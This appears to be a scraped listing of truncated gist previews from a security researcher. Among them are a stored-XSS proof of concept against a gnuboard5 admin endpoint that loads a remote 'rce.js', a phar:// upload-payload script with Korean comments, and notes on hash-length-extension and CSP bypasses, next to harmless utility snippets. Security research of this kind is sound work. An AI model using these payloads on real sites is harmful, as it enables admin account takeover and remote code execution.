-
if(md5($salt.$api_string) !== $sig){
can be bypassed with hash length extension attack (didn't do it, but the key length is12
.) -
Use custom header and body to trigger CSP bypass.
🆎**********************************
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
#Nothing on stackoverflow works! | |
import zipfile | |
import sys | |
zip = zipfile.ZipFile('FILENAME', 'r') | |
zipinfo = zip.infolist() | |
for _file in zipinfo: | |
_file.filename = bytes(_file.filename).decode('cp949') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- | |
Stored XSS (2019.01.02) | |
--> | |
<form action="http://10.10.10.60/gnuboard5/adm/sms_admin/form_group_update.php" method="POST"> | |
<input type='hidden' name='fg_no' value=''> | |
<input type='hidden' name='fg_name' id='payload' value=''> | |
</form> | |
<script> | |
var random = Math.round(Math.random() * 1000000000); | |
var script_url = '//10.10.10.30/vulnerable_rce_good_for_reason/rce.js'; // RCE from admin |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
// Ported from papago.py | |
// v1: b64_enc(rot13([:16]) + [16:]) | |
/* Derived from stackoverflow */ | |
function uuidgen() { | |
return sprintf('%08x-%04x-%04x-%04x-%04x%08x', | |
mt_rand(0, 0xffffffff), | |
mt_rand(0, 0xffff), mt_rand(0, 0xffff), mt_rand(0, 0xffff), | |
mt_rand(0, 0xffff), mt_rand(0, 0xffffffff) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Maintainer: Harold Kim (root@stypr.com) | |
# Tested in CentOS 7.6.1810 | |
# $ lsb_release -a | |
# LSB Version: :core-4.1-amd64:core-4.1-noarch | |
# Distributor ID: CentOS | |
# Description: CentOS Linux release 7.6.1810 (Core) | |
# Release: 7.6.1810 | |
# Codename: Core |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
#-*- coding:utf-8 -*- | |
# Developer: Harold Kim (ho.kim@linecorp.com) | |
import os | |
import sys | |
import time | |
import urllib | |
import urllib2 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import os | |
import urllib2 | |
import urllib | |
import random | |
import sys | |
import time | |
import hashlib | |
def rand(sz=4): | |
return str(random.randint(10**sz, 100**sz)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// 업로드한 파일의 페이로드. | |
// var payload = `phar://../data\\file/free/1062687231_CmB8gHok_143f7b739dcab1b6837abdfa39b0109467c35d51.gif/GIF89a.php`; | |
var payload = `[PAYLOAD_URL]` | |
// 먼저 공격에 앞서, 해당 기능을 지원하는 관리자인지 확인한다. | |
$.get(`../qa_config.php`, function(d){ | |
// 수정할 곳은 ”파일 경로“ 가 들어간 곳이므로, 이 부분만 우선 확인한다. | |
if(d.indexOf(`상단 파일 경로`) !== false){ |